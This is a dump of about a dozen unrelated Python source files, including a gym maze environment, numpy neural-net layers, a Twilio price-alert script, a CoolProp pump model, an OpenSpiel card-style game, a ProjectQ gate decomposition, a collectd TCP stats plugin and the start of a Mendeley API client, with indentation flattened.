at_goal = self.pos == self.end_pos
done = at_goal or self.num_steps >= 200
if verbose:
print(f"step: {self.num_steps}, pos: {self.pos}")
return (np.array(self.pos),
1 * int(at_goal), done, {})
def _get_new_pos(self, pos, direction):
if direction == 0:
new_pos = (pos[0] - 1, pos[1])
elif direction == 1:
new_pos = (pos[0], pos[1] + 1)
elif direction == 2:
new_pos = (pos[0] + 1, pos[1])
elif direction == 3:
new_pos = (pos[0], pos[1] - 1)
if (new_pos[0] >= 0 and new_pos[0] < self.x_dim and new_pos[1] >= 0 and new_pos[1] < self.y_dim
and self.map[new_pos[0]][new_pos[1]] != "#"):
return new_pos
else:
return pos # did not move
def set_member(self, member):
self.member = member
def member_color(self):
if self.member == 0:
return [51, 255, 69]
elif self.member == 1:
return [255, 190, 51]
else:
raise ValueError
def _get_image(self, alpha=0.995):
frame_t = self.bg.copy()
frame_t[self.pos] = self.member_color()
# frame[self.end_pos] = [0, 0, 255]
# self.frame = (alpha * self.frame + (1 - alpha) * frame_t).astype(np.uint8)
self.frame[self.pos] = self.member_color()
return np.concatenate([frame_t, self.frame], axis=1)
def render(self, mode='human'):
img = self._get_image()
if mode == 'rgb_array':
return img
elif mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
return self.viewer.isopen
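# Hedged smoke-test sketch: a random rollout against the interface above;
# purely illustrative.
if __name__ == '__main__':
    env = MazeEnv()
    obs = env.reset()
    done = False
    while not done:
        obs, reward, done, info = env.step(env.action_space.sample())
    print('episode ended at', env.pos, 'after', env.num_steps, 'steps')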
|
py | 1a37f9e4a6575882107c99b506ff31fa3f8d4411 | import numpy as np
def l2_regularization(W, reg_strength):
l2_reg_loss = reg_strength * np.sum(np.square(W))
grad = reg_strength * 2 * W
return l2_reg_loss, grad
def softmax(predictions):
copy_predictions = np.copy(predictions)
if predictions.ndim == 1:
copy_predictions -= np.max(copy_predictions)
calculated_exp = np.exp(copy_predictions)
copy_predictions = calculated_exp / np.sum(calculated_exp)
else:
copy_predictions -= np.amax(copy_predictions, axis=1, keepdims=True)
calculated_exp = np.exp(copy_predictions)
copy_predictions = calculated_exp / np.sum(calculated_exp, axis=1, keepdims=True)
return copy_predictions
def cross_entropy_loss(probs, target_index):
if probs.ndim == 1:
loss_func = -np.log(probs[target_index])
else:
batch_size = probs.shape[0]
every_batch_loss = -np.log(probs[range(batch_size), target_index])
loss_func = np.sum(every_batch_loss) / batch_size
return loss_func
def softmax_with_cross_entropy(preds, target_index):
d_preds = softmax(preds)
loss = cross_entropy_loss(d_preds, target_index)
if preds.ndim == 1:
d_preds[target_index] -= 1
else:
batch_size = preds.shape[0]
d_preds[range(batch_size), target_index] -= 1
d_preds /= batch_size
return loss, d_preds
class Param:
def __init__(self, value):
self.value = value
self.grad = np.zeros_like(value)
class ReLULayer:
def __init__(self):
pass
def forward(self, X):
self.X = X
return np.where(X >= 0, X, 0.0)
def backward(self, d_out: np.array) -> np.array:
d_result = np.where(self.X >= 0.0, 1.0, 0.0) * d_out
return d_result
def params(self):
return {}
class FullyConnectedLayer:
def __init__(self, n_input, n_output):
self.W = Param(0.001 * np.random.randn(n_input, n_output))
self.B = Param(0.001 * np.random.randn(1, n_output))
self.X = None
def forward(self, X):
self.X = X
return X @ self.W.value + self.B.value
def backward(self, d_out):
self.W.grad += self.X.T @ d_out
self.B.grad += np.sum(d_out, axis=0)
d_input = d_out @ self.W.value.T
return d_input
def params(self):
return {'W': self.W, 'B': self.B}
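# Hedged sketch: one forward/backward pass through a tiny two-layer net built
# from the pieces above; the shapes and the 0.1 learning rate are illustrative.
if __name__ == '__main__':
    np.random.seed(0)
    X = np.random.randn(4, 3)       # batch of 4 samples, 3 features
    y = np.array([0, 1, 1, 0])      # 2 classes
    fc1, relu, fc2 = FullyConnectedLayer(3, 5), ReLULayer(), FullyConnectedLayer(5, 2)
    out = fc2.forward(relu.forward(fc1.forward(X)))
    loss, d_out = softmax_with_cross_entropy(out, y)
    fc1.backward(relu.backward(fc2.backward(d_out)))
    for layer in (fc1, fc2):
        for p in layer.params().values():
            p.value -= 0.1 * p.grad  # one plain SGD step
    print('loss:', loss)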
|
py | 1a37fa9aec6f5f6f45bb9815e1d240082de2f0bb | import logging
import os
import sys
import time
import click
from .investing import Investing
from .sendtext import SendText
__version__ = "0.0.4"
def setup_logging():
"""Create a basic console based logger object.
Args:
None
Returns:
logger (logging.logger): Logger object.
"""
log_handler = logging.StreamHandler()
log_handler.setFormatter(
logging.Formatter(
"%(asctime)s [%(levelname)5s] %(funcName)4s() - %(message)s",
"%Y-%m-%d %H:%M:%S",
)
)
logger = logging.getLogger(__name__)
logger.addHandler(log_handler)
logger.setLevel(logging.INFO)
return logger
def run(
instrument: Investing,
send_message: SendText,
lower: float,
upper: float,
threshold: float,
) -> tuple:
instrument.fetch()
logger.debug("Fetched page successfully.")
price = instrument.price()
logger.debug(f"Price of {instrument.name} is ${price}.")
if price >= upper or price <= lower:
logger.info(f"Price {price} breached price band [{lower}, {upper}].")
logger.debug(f"Resetting price band with threshold value {threshold}.")
upper = price * (1 + threshold / 10000)
lower = price * (1 - threshold / 10000)
logger.info(f"Resetting price band to [{lower}, {upper}].")
logger.debug("Sending text.")
send_message.send(f"{instrument.name} price is {price}.")
return (lower, upper)
@click.command(
context_settings=dict(help_option_names=["-h", "--help"]),
options_metavar="[options...]",
)
@click.argument("to_num", metavar="[to number]")
@click.argument("from_num", metavar="[from number]")
@click.argument("market", metavar="[market]")
@click.argument("contract", metavar="[contract]")
@click.argument("priceband", metavar="[priceband]")
@click.option("--symbol", "-s", help="Contract symbol. [default: contract]")
@click.option(
"--threshold", "-t", help="Threshold in bps.", default=100.0, show_default=True
)
@click.option(
"--interval",
"-i",
help="Interval to perform check (mins).",
default=1.0,
show_default=True,
)
@click.option(
"--sub-market", "-m", help="E.g. crypto is market and bitcoin is sub market."
)
@click.option("--debug", "-d", is_flag=True, help="Print debug messages.")
def main(
to_num,
from_num,
interval,
threshold,
debug=None,
symbol=None,
market=None,
contract=None,
priceband=None,
sub_market=None,
):
"""Utiltiy script to notify if instrument price fluctuates out of price band.
"""
global logger
logger = setup_logging()
if debug:
logger.setLevel(logging.DEBUG)
logger.debug("Logging set to debug.")
if ("TWILIO_AUTH_TOKEN" in os.environ) and ("TWILIO_ACCOUNT_SID" in os.environ):
pass
else:
logger.error("TWILIO_AUTH_TOKEN and/or TWILIO_ACCOUNT_SID not defined.")
sys.exit(1)
lower, upper = list(map(float, priceband.split("-")))
if sub_market:
end_point = market + "/" + sub_market + "/" + contract
else:
end_point = market + "/" + contract
logger.debug(f"{end_point} end point will be queried.")
instrument = Investing(end_point, symbol)
text_client = SendText(from_num, to_num)
while True:
try:
lower, upper = run(instrument, text_client, lower, upper, threshold)
time.sleep(60 * interval)
except KeyboardInterrupt:
logger.info("Caught interrupt, exiting...")
sys.exit()
if __name__ == "__main__":
main()
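# Example invocation (hypothetical numbers and package name, shown for
# illustration only; Twilio credentials must be set in the environment):
#   export TWILIO_ACCOUNT_SID=... TWILIO_AUTH_TOKEN=...
#   python -m pricewatch +15550001111 +15550002222 crypto btc-usd 30000-40000 \
#       --sub-market bitcoin --threshold 50 --interval 5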
|
py | 1a37fa9b31da720437e88f04d34f335ee540eabd | #Given a list of numbers and a number k, return whether any two numbers from the list add up to k.
#For example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.
#Bonus: Can you do this in one pass?
if __name__ == "__main__":
l = list( int(i) for i in input().split(' '))
k = int(input())
found = False
for el in range(len(l)):
check = k - l[el]
if check in l:
found = Tru
print(found)
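# One-pass answer to the bonus question (a sketch added for illustration):
# remember every value seen so far; x pairs with an earlier element iff
# k - x is already in the set.
def has_pair_sum(nums, k):
    seen = set()
    for x in nums:
        if k - x in seen:
            return True
        seen.add(x)
    return False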
|
py | 1a37fbe533f4357c2dc72efc54fd947f1bff5cf2 | from __future__ import division, print_function  # Make integer 3/2 give 1.5 and print a function in Python 2.x
from CoolProp.CoolProp import PropsSI
from Correlations import Tsat
class PumpClass():
"""
Pump Model based on correlations obtained from experimental results
"""
def __init__(self,**kwargs):
#Load up the parameters passed in
# using the dictionary
self.__dict__.update(kwargs)
def Update(self,**kwargs):
#Update the parameters passed in
# using the dictionary
self.__dict__.update(kwargs)
def OutputList(self):
"""
Return a list of parameters for this component for further output
It is a list of tuples, and each tuple is formed of items with indices:
[0] Description of value
[1] Units of value
[2] The value itself
"""
return []
def Calculate(self):
#Local copies of coefficients
W=self.W
#Power
#Compute the pressure difference between the outlet and the inlet of the pump
self.DELTAP=self.pout_r-self.pin_r
#Get the rated power for all pressure differences
W_dot_rated=W[0]*self.DELTAP+W[1]
#Speed ratio
N_ratio=self.N/self.N_rated
#Get the estimation of the power
self.W_dot=(W[2]*N_ratio+W[3])*W_dot_rated
#Mass flow rate
#Define the slope of the line corresponding to the exhaust temperature as a linear interpolation of the minimum and maximum slope
slope=(self.slope_max-self.slope_min)/(self.p_max-self.p_min)*(self.pout_r-self.p_min)+self.slope_min
#Define the intercept of the line corresponding to the exhaust temperature
intercept=(self.intercept_max-self.intercept_min)/(self.p_max-self.p_min)*(self.pout_r-self.p_min)+self.intercept_min
self.m_dot=slope*self.N+intercept
#Outlet state
hin=PropsSI('H','T',self.Tin+273.15,'P',self.pin_r*1000,self.Ref)#*1000
self.s_in = PropsSI('S','T',self.Tin+273.15,'P',self.pin_r*1000,self.Ref)/1000
hout=hin+self.W_dot/self.m_dot
self.Tout=PropsSI('T','H',hout,'P',self.pout_r*1000,self.Ref) #in K
self.s_out=PropsSI('S','T',self.Tout,'P',self.pout_r*1000 + 100,self.Ref)/1000
self.Tout_s = PropsSI('T','S',self.s_in*1000,'P',self.pout_r*1000,self.Ref)
if __name__=='__main__':
"""
Example Diaphragm pump WANNER ENGINEERING
"""
pin_r_list=[794.7276887,780.158035,784.3067128,808.239602,822.8122092,826.29617,887.1980418]
pout_r_list=[1645.186859,1684.81582,1712.113611,1715.081928,1618.593683,1616.02753,1728.196266]
N_list=[1099.97098,1099.809986,1099.72049,1099.818785,1099.743137,1099.450796,1099.270196]
Tin_list=[15.4903837535014,15.3066340782123,15.5798263305322,15.7492877094972,15.5736862745098,15.7364804469274,15.0563305322129]
W_list_meas = [235.4954587,236.254973,245.3089328,241.3617462,233.9065263,228.6898989,239.6439083]
for pin_r,pout_r,N,Tin,Wmeas in zip(pin_r_list,pout_r_list,N_list,Tin_list,W_list_meas):
kwds={
'W':[0.1096,114.34,1.0993,-0.0981],
'Ref':'R134a',
'pin_r':pin_r,
'pout_r':pout_r,
'N':N,
'N_rated':995,
'slope_min':0.000133504, #corresponding to the min outlet pressure
'slope_max':0.000114377, #corresponding to the max outlet pressure
'intercept_min':0.004, #corresponding to the min outlet pressure
'intercept_max':0.025, #corresponding to the max outlet pressure
'p_min':700.4260866,
'p_max':2659.623637,
'Tin':Tin
}
Pump=PumpClass(**kwds)
Pump.Calculate()
        print('Calculated:', Pump.W_dot, 'W', 'Measured:', Wmeas, 'W')
|
py | 1a37fc676e4940a2de137f66f48fdd937500d15e | # Copyright 2019 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as python3
"""Kuhn Poker implemented in Python.
This is a simple demonstration of implementing a game in Python, featuring
chance and imperfect information.
Python games are significantly slower than C++, but it may still be suitable
for prototyping or for small games.
It is possible to run C++ algorithms on Python-implemented games. This is likely
to have good performance if the algorithm simply extracts a game tree and then
works with that. It is likely to be poor if the algorithm relies on processing
and updating states as it goes, e.g. MCTS.
"""
import enum
import numpy as np
import pyspiel
from open_spiel.python.games.tt_utils import *
_NUM_PLAYERS = 2
_NUM_ACTIONS = (len(TITAN_IDS) + NUM_TILES)*MAX_TITANS
_MAX_GAME_LENGTH = 48
# r1: (2 titans + 2 tiles) * 2 players
# r2: (1 titan + 3 tiles) * 2 players
# r3: (1 titan + 4 tiles) * 2 players
# r4: (1 titan + 5 tiles) * 2 players
# r5: (5 tiles) * 2 players
_GAME_TYPE = pyspiel.GameType(
short_name="tt",
long_name="Tiny Titans",
dynamics=pyspiel.GameType.Dynamics.SEQUENTIAL,
chance_mode=pyspiel.GameType.ChanceMode.DETERMINISTIC,
information=pyspiel.GameType.Information.IMPERFECT_INFORMATION,
utility=pyspiel.GameType.Utility.ZERO_SUM,
reward_model=pyspiel.GameType.RewardModel.TERMINAL,
max_num_players=_NUM_PLAYERS,
min_num_players=_NUM_PLAYERS,
provides_information_state_string=True,
provides_information_state_tensor=True,
provides_observation_string=True,
provides_observation_tensor=True,
provides_factored_observation_string=True)
_GAME_INFO = pyspiel.GameInfo(
num_distinct_actions=_NUM_ACTIONS,
max_chance_outcomes=0,
num_players=_NUM_PLAYERS,
min_utility=-1.03,
max_utility=1.03,
utility_sum=0.0,
max_game_length=_MAX_GAME_LENGTH)
class TTGame(pyspiel.Game):
"""A Python version of Tiny Titans."""
def __init__(self, params=None):
super().__init__(_GAME_TYPE, _GAME_INFO, params or dict())
def new_initial_state(self):
"""Returns a state corresponding to the start of a game."""
return TTState(self)
def make_py_observer(self, iig_obs_type=None, params=None):
"""Returns an object used for observing game state."""
return TTObserver(
iig_obs_type or pyspiel.IIGObservationType(perfect_recall=False),
params)
class TTState(pyspiel.State):
"""A python version of the tt state."""
def __init__(self, game):
"""Constructor; should only be called by Game.new_initial_state."""
super().__init__(game)
self.score = [0, 0]
self.titans = [[], []]
self.tiles = [[], []]
self.last_tiles = [[], []] # needed because we wipe placements on new rounds
self.round = 0 # represents the group of turns that leads into a battle
self.actions = []
self._next_player = 0
self._game_over = False
def _cur_max_titans(self):
return min(self.round+2, MAX_TITANS)
# OpenSpiel (PySpiel) API functions are below. This is the standard set that
# should be implemented by every sequential-move game with chance.
def current_player(self):
"""Returns id of the next player to move, or TERMINAL if game is over."""
if self._game_over:
return pyspiel.PlayerId.TERMINAL
else:
return self._next_player
def _legal_actions(self, player):
"""Returns a list of legal actions, sorted in ascending order."""
assert player >= 0
ret = []
my_titans = self.titans[player]
my_tiles = self.tiles[player]
used_titans = set(my_titans)
used_tiles = set(my_tiles)
if len(my_titans) < self._cur_max_titans():
base_index = len(my_titans)*len(TITAN_IDS)
for titan_index in range(len(TITAN_IDS)):
if titan_index not in used_titans:
ret.append((base_index+titan_index))
return ret
else: # tile index
base_index = MAX_TITANS*len(TITAN_IDS) + len(my_tiles)*NUM_TILES
for tile_index in range(NUM_TILES):
if tile_index not in used_tiles:
ret.append((base_index+tile_index))
return ret
def chance_outcomes(self):
"""Returns the possible chance outcomes and their probabilities."""
assert self.is_chance_node()
assert False, "not implemented"
return 0
# either apply next titan slot, or placement slot
def _parse_action(self, action):
next_titan = None
next_tile = None
my_titans = self.titans[self._next_player]
my_tiles = self.tiles[self._next_player]
base_tile_index = MAX_TITANS*len(TITAN_IDS)
if action < base_tile_index: # create titan
assert len(my_titans) < self._cur_max_titans()
titan_slot = action//len(TITAN_IDS)
assert titan_slot == len(my_titans)
next_titan = action % len(TITAN_IDS)
else: # set tile
assert len(my_tiles) < len(my_titans)
tile_slot = (action-base_tile_index)//NUM_TILES
assert tile_slot == len(my_tiles)
next_tile = (action-base_tile_index) % NUM_TILES
return next_titan, next_tile
def _apply_action(self, action):
"""Applies the specified action to the state."""
if self.is_chance_node():
assert False, "Not Implemented"
return
else:
self.actions.append(action)
my_titans = self.titans[self._next_player]
my_tiles = self.tiles[self._next_player]
next_titan, next_tile = self._parse_action(action)
if next_titan is not None:
my_titans.append(next_titan)
else:
my_tiles.append(next_tile)
# self round placement still incomplete
if len(my_titans) < self._cur_max_titans() or len(my_tiles) < len(my_titans):
return
# player 0 done, player 1 turn
if self._next_player == 0:
self._next_player = 1
return
# both done, play a game
is_p0_win = check_server_win(self.titans, self.tiles)
if is_p0_win:
self.score[0] += 1
else:
self.score[1] += 1
# if a round ended
if self.score[0] != 3 and self.score[1] != 3:
self.round += 1
self._next_player = 0
self.last_tiles = self.tiles
self.tiles = [[], []]
return
# if is complete
self._game_over = True
def _action_to_string(self, player, action):
"""Action -> string."""
# TODO: toname and totile functions
next_titan, next_tile = self._parse_action(action)
if next_titan is not None:
cmd = TITAN_ID_TO_NAME[TITAN_IDS[next_titan]]
else:
cmd = next_tile+1
return f"{player}({cmd})"
def is_terminal(self):
"""Returns True if the game is over."""
return self._game_over
def returns(self):
"""Total reward for each player over the course of the game so far."""
points_0 = self.score[0]//3 + self.score[0]*0.01
points_1 = self.score[1]//3 + self.score[1]*0.01
return [points_0-points_1, points_1-points_0]
def __str__(self):
"""String for debug purposes. No particular semantics are required."""
"""Observation of `state` from the PoV of `player`, as a string."""
pieces = []
pieces.append(f"round {self.round}")
pieces.append(f"score {self.score}")
for cur_player in range(2):
titans = self.titans[cur_player]
titans = [f"{TITAN_ID_TO_NAME[TITAN_IDS[tindex]]}({TITAN_IDS[tindex]})" for tindex in titans]
pieces.append(f"private titans p{cur_player} {titans}")
for cur_player in range(2):
pieces.append(f"private tiles p{cur_player} {self.tiles[cur_player]}")
return "\n".join(pieces)
class TTObserver:
"""Observer, conforming to the PyObserver interface (see observation.py)."""
def __init__(self, iig_obs_type, params):
"""Initializes an empty observation tensor."""
if params:
raise ValueError(f"Observation parameters not supported; passed {params}")
# Determine which observation pieces we want to include.
pieces = [("player", 2, (2,)), ("round", 1, (1,))]
if iig_obs_type.private_info == pyspiel.PrivateInfoType.SINGLE_PLAYER:
pieces.append(("private_titans", MAX_TITANS * len(TITAN_IDS), (MAX_TITANS, len(TITAN_IDS))))
pieces.append(("private_tiles", MAX_TITANS * NUM_TILES, (MAX_TITANS, NUM_TILES)))
if iig_obs_type.public_info:
if iig_obs_type.perfect_recall:
pieces.append(("actions", _MAX_GAME_LENGTH*_NUM_ACTIONS, (_MAX_GAME_LENGTH, _NUM_ACTIONS)))
else:
pieces.append(("score", 2, (2,)))
pieces.append(("public_titans", MAX_TITANS * len(TITAN_IDS) * 2, (MAX_TITANS, len(TITAN_IDS), 2)))
pieces.append(("public_tiles", MAX_TITANS * NUM_TILES * 2, (MAX_TITANS, NUM_TILES, 2)))
# Build the single flat tensor.
total_size = sum(size for name, size, shape in pieces)
self.tensor = np.zeros(total_size, np.float32)
# Build the named & reshaped views of the bits of the flat tensor.
self.dict = {}
index = 0
for name, size, shape in pieces:
self.dict[name] = self.tensor[index:index + size].reshape(shape)
index += size
def set_from(self, state: TTState, player):
"""Updates `tensor` and `dict` to reflect `state` from PoV of `player`."""
self.tensor.fill(0)
if "player" in self.dict:
self.dict["player"][player] = 1
if "round" in self.dict:
self.dict["round"][0] = state.round
if "score" in self.dict:
self.dict["score"][0] = state.score[0]
self.dict["score"][1] = state.score[1]
if "private_titans" in self.dict:
for i, titan in enumerate(state.titans[player]):
self.dict["private_titans"][i][titan] = 1
if "private_tiles" in self.dict:
for i, tile in enumerate(state.tiles[player]):
self.dict["private_tiles"][i][tile] = 1
if "public_titans" in self.dict:
for cur_player in range(2):
for i, titan in enumerate(state.titans[cur_player][:len(state.last_tiles[cur_player])]):
self.dict["public_titans"][i][titan][cur_player] = 1
if "public_tiles" in self.dict:
for cur_player in range(2):
for i, tile in enumerate(state.last_tiles[cur_player]):
self.dict["public_tiles"][i][tile][cur_player] = 1
if "actions" in self.dict:
for turn, action in enumerate(state.actions):
self.dict["actions"][turn, action] = 1
def string_from(self, state: TTState, player):
"""Observation of `state` from the PoV of `player`, as a string."""
pieces = []
if "player" in self.dict:
pieces.append(f"p{player}")
if "round" in self.dict:
pieces.append(f"round {state.round}")
if "score" in self.dict:
pieces.append(f"score {state.score}")
if "private_titans" in self.dict:
pieces.append(f"private titans {state.titans[player]}")
if "private_tiles" in self.dict:
pieces.append(f"private tiles {state.tiles[player]}")
if "public_titans" in self.dict:
for cur_player in range(2):
pieces.append(f"public titans p{cur_player} {state.titans[cur_player][:len(state.last_tiles[cur_player])]}")
if "public_tiles" in self.dict:
for cur_player in range(2):
pieces.append(f"private tiles p{cur_player} {state.last_tiles[cur_player]}")
if "actions" in self.dict:
pieces.append(f"action history {self.dict['actions']}")
return " ".join(str(p) for p in pieces)
# Register the game with the OpenSpiel library
pyspiel.register_game(_GAME_TYPE, TTGame)
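# A smoke-test sketch (illustrative, not part of the original file): load the
# registered game and play uniformly random legal actions to a terminal state.
# Assumes the tt_utils helpers (including whatever backend check_server_win
# queries) are available in this environment.
if __name__ == "__main__":
  game = pyspiel.load_game("tt")
  state = game.new_initial_state()
  rng = np.random.RandomState(0)
  while not state.is_terminal():
    state.apply_action(rng.choice(state.legal_actions()))
  print(state)
  print("returns:", state.returns())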
|
py | 1a37fda96d7922a6cb5ccfd22b6c1bc33ee59152 | # Generated by Django 3.2.4 on 2021-07-26 11:38
import hashlib
from django.db import migrations
def update_entity_hash(apps, schema_editor):
    # We can't import the Entity model directly as it may be a newer
# version than this migration expects. We use the historical version.
Entity = apps.get_model('core', 'Entity')
for entity in Entity.objects.all():
if entity.hash:
continue
data = entity.name + entity.entity_type + entity.date_added.strftime('%Y%m%d')
hash = hashlib.md5(data.encode('utf-8')).hexdigest()
entity.hash = hash
entity.save()
class Migration(migrations.Migration):
dependencies = [
('core', '0175_lotv2_lots_v2_year_87d135_idx'),
]
operations = [
migrations.RunPython(update_entity_hash),
]
|
py | 1a37fdbe503027d522768544e89c291d7b4c834c | #!/usr/bin/env python
# -*- coding: utf-8; -*-
#
# collectd implementation of:
# https://github.com/BrightcoveOS/Diamond/blob/master/src/collectors/tcp/tcp.py
import collectd
import os
class Tcp(object):
PROC = ['/proc/net/netstat', '/proc/net/snmp']
GAUGES = ['CurrEstab', 'MaxConn']
def __init__(self):
self.plugin_name = "tcp"
self.allowed_metrics = []
def config(self, obj):
for node in obj.children:
if node.key == 'Metrics':
self.allowed_metrics = node.values
def log(self, t, message):
if t == 'err':
collectd.error('%s: %s' %(self.plugin_name, message))
elif t == 'warn':
collectd.warning('%s: %s' %(self.plugin_name, message))
elif t == 'verb':
collectd.info('%s: %s' %(self.plugin_name, message))
else:
collectd.info('%s: %s' %(self.plugin_name, message))
def submit(self, metric_name, value, type):
v = collectd.Values()
v.plugin = self.plugin_name
v.type = type
v.type_instance = metric_name
v.values = [int(value)]
v.dispatch()
def collect(self):
metrics = {}
for filepath in self.PROC:
if not os.access(filepath, os.R_OK):
                self.log('err', 'Permission to access %s denied' % filepath)
continue
header = ''
data = ''
            # Seek the file for the first line that starts with Tcp; in /proc
            # the data row immediately follows the header row.
            try:
                with open(filepath) as proc_file:
                    line = proc_file.readline()
                    while line:
                        if line.startswith("Tcp"):
                            header = line
                            data = proc_file.readline()
                            break
                        line = proc_file.readline()
            except IOError:
                self.log('err', 'Failed to open %s' % filepath)
                continue
# No data from the file?
if header == '' or data == '':
                self.log('err', '%s has no lines with Tcp' % filepath)
continue
header = header.split()
data = data.split()
            for i in range(1, len(header)):
metrics[header[i]] = data[i]
#Send TCP stats to collectd
allowed_metrics = set(self.allowed_metrics).intersection(metrics.keys())
for metric_name in metrics:
if metric_name in allowed_metrics:
                value = int(metrics[metric_name])
if metric_name in self.GAUGES:
self.submit(metric_name, value, 'gauge')
else:
self.submit(metric_name, value, 'counter')
tcp = Tcp()
collectd.register_read(tcp.collect)
collectd.register_config(tcp.config)
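# Example collectd configuration (illustrative) for loading this plugin through
# collectd's python plugin; the Metrics values feed Tcp.config() above:
#
#   <Plugin python>
#       ModulePath "/path/to/plugin/dir"
#       Import "tcp"
#       <Module tcp>
#           Metrics "CurrEstab" "InSegs" "OutSegs" "RetransSegs"
#       </Module>
#   </Plugin>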
|
py | 1a37feb6af12c9c418ec6a3b79b4fc01be043b50 | # -*- coding: utf-8 -*-
"""Tests for thanks-related code."""
#
# (C) Pywikibot team, 2016-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
from pywikibot.flow import Topic
from tests.aspects import TestCase
from tests import unittest
NO_THANKABLE_POSTS = 'There is no recent post which can be test thanked.'
class TestThankFlowPost(TestCase):
"""Test thanks for Flow posts."""
family = 'test'
code = 'test'
write = True
@classmethod
def setUpClass(cls):
"""Set up class."""
super(TestThankFlowPost, cls).setUpClass()
cls._topic_title = 'Topic:Tvkityksg1ukyrrw'
def test_thank_post(self):
"""Test thanks for Flow posts."""
found_log = False
site = self.get_site()
topic = Topic(site, self._topic_title)
for post in reversed(topic.replies()):
user = post.creator
if site.user() == user.username:
continue
if user.is_thankable:
break
else:
self.skipTest(NO_THANKABLE_POSTS)
before_time = site.getcurrenttimestamp()
post.thank()
log_entries = site.logevents(logtype='thanks', total=5, page=user,
start=before_time, reverse=True)
try:
next(iter(log_entries))
except StopIteration:
found_log = False
else:
found_log = True
self.assertTrue(found_log)
def test_self_thank(self):
"""Test that thanking one's own Flow post causes an error."""
site = self.get_site()
topic = Topic(site, self._topic_title)
my_reply = topic.reply('My attempt to thank myself.')
self.assertAPIError('invalidrecipient', None, my_reply.thank)
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
|
py | 1a37ff0458f9b95a840e18e223096e41f7e0e9bc | # -*- coding: utf-8 -*-
# Copyright 2018 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Module uses ideas from "Basic circuit compilation techniques
# for an ion-trap quantum machine" by Dmitri Maslov (2017) at
# https://iopscience.iop.org/article/10.1088/1367-2630/aa5e47
"""
Registers a decomposition for a CNOT gate in terms of Rxx, Rx and Ry gates.
"""
import math
from projectq.cengines import DecompositionRule
from projectq.meta import get_control_count
from projectq.ops import Ph, Rxx, Ry, Rx, X
def _decompose_cnot2rxx_M(cmd): # pylint: disable=invalid-name
"""Decompose CNOT gate into Rxx gate."""
# Labelled 'M' for 'minus' because decomposition ends with a Ry(-pi/2)
ctrl = cmd.control_qubits
Ry(math.pi / 2) | ctrl[0]
Ph(7 * math.pi / 4) | ctrl[0]
Rx(-math.pi / 2) | ctrl[0]
Rx(-math.pi / 2) | cmd.qubits[0][0]
Rxx(math.pi / 2) | (ctrl[0], cmd.qubits[0][0])
Ry(-1 * math.pi / 2) | ctrl[0]
def _decompose_cnot2rxx_P(cmd): # pylint: disable=invalid-name
"""Decompose CNOT gate into Rxx gate."""
# Labelled 'P' for 'plus' because decomposition ends with a Ry(+pi/2)
ctrl = cmd.control_qubits
Ry(-math.pi / 2) | ctrl[0]
Ph(math.pi / 4) | ctrl[0]
Rx(-math.pi / 2) | ctrl[0]
Rx(math.pi / 2) | cmd.qubits[0][0]
Rxx(math.pi / 2) | (ctrl[0], cmd.qubits[0][0])
Ry(math.pi / 2) | ctrl[0]
def _recognize_cnot2(cmd):
"""Identify that the command is a CNOT gate (control - X gate)"""
return get_control_count(cmd) == 1
#: Decomposition rules
all_defined_decomposition_rules = [
DecompositionRule(X.__class__, _decompose_cnot2rxx_M, _recognize_cnot2),
DecompositionRule(X.__class__, _decompose_cnot2rxx_P, _recognize_cnot2),
]
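# A usage sketch (illustrative, not part of the library): an InstructionFilter
# that rejects singly-controlled X forces the AutoReplacer to rewrite CNOT with
# the Rxx/Rx/Ry rules above. Assumes ProjectQ's default Simulator backend.
if __name__ == "__main__":
    from projectq import MainEngine
    from projectq.cengines import AutoReplacer, DecompositionRuleSet, InstructionFilter
    from projectq.ops import All, CNOT, Measure

    def _no_cnot(eng, cmd):
        # Declare singly-controlled X unsupported; everything else passes through.
        return not (isinstance(cmd.gate, X.__class__) and get_control_count(cmd) == 1)

    rule_set = DecompositionRuleSet(rules=all_defined_decomposition_rules)
    eng = MainEngine(engine_list=[AutoReplacer(rule_set), InstructionFilter(_no_cnot)])
    qureg = eng.allocate_qureg(2)
    CNOT | (qureg[0], qureg[1])
    All(Measure) | qureg
    eng.flush()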
|
py | 1a37ff3cb7ccbe5a460291eec3807ce1e677b28b | import os
import utils
def main():
src_file = os.path.join(os.getcwd(), "deploy/roles/default_role.yaml")
dst_file = os.path.join(os.getcwd(), "build/default_role.yaml")
with open(src_file, "r") as src:
with open(dst_file, "w+") as dst:
data = src.read()
print("Deploying {}".format(dst_file))
dst.write(data)
utils.apply(dst_file)
if __name__ == "__main__":
main()
|
py | 1a37ff3e1770ef5e5b5c0c44b1c7120857480268 | from mendeley.exception import MendeleyException
from mendeley.models.documents import *
from mendeley.resources.base import add_query_params, ListResource
from mendeley.resources.base_documents import DocumentsBase
class Documents(DocumentsBase):
"""
Top-level resource for accessing documents. These can be:
- documents for the logged-in user, if retrieved from a
:func:`MendeleySession <mendeley.session.MendeleySession.documents>`.
- documents in a :func:`Group <mendeley.models.groups.Group.documents>`.
"""
_url = '/documents'
def __init__(self, session, group_id):
super(Documents, self).__init__(session, group_id)
def get(self, id, view=None):
"""
Retrieves a document by ID.
:param id: the ID of the document to get.
:param view: the view to get. One of 'bib', 'client', 'tags', 'all'.
:return: a :class:`UserDocument <mendeley.models.documents.UserDocument>`.
"""
return super(Documents, self).get(id, view)
def list(self, page_size=None, view=None, sort=None, order=None, modified_since=None, deleted_since=None, marker=None, folder_id=None, tag=None, page=None):
"""
